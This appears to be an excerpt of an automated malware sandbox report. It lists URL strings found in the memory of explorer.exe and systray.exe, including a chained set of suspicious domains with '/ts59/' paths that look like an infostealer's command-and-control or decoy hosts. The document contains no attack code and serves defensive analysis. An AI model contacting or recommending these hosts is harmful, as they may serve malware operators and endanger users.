          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000000.1438602211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1438329693.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1437589686.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3877014382.0000000002C60000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.00050516.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.00050516.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyz/ts59/www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.00050516.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.club/ts59/www.ujgddhhfeffsfgg2.group
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.76466.clubReferer:
          Source: explorer.exe, 00000003.00000002.3881369935.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438491997.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290624703.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3082368155.00000000085E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyz/ts59/www.gb-electric-wheelchairs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babyscan.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyz/ts59/www.babyscan.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bvlazaedi.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shop/ts59/www.kgstrengthandperformance.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checkout4xgrow.shopReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bond/ts59/www.zu89.top
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ec-delivery-jobs-8j.bondReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.pro/ts59/www.00050516.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gas39.proReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bond/ts59/www.76466.club
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gb-electric-wheelchairs-8j.bondReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.com/ts59/www.bvlazaedi.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kgstrengthandperformance.comReferer:
          Source: explorer.exe, 00000003.00000002.3887605921.000000001097F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000574F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.online/ts59/www.momura.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.modleavedepts.onlineReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyz/ts59/www.gas39.pro
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.momura.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bond
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texhio.onlineReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.com/ts59/www.zangbreaker.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topallinoneaccounting.comReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.group/ts59/www.modleavedepts.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ujgddhhfeffsfgg2.groupReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.com/ts59/www.texhio.online
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zangbreaker.comReferer:
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.top
          Source: explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.top/ts59/
          Source: explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zu89.topReferer:
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/~T
          Source: explorer.exe, 00000003.00000003.2291674421.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3089297174.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1435576590.0000000002F10000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
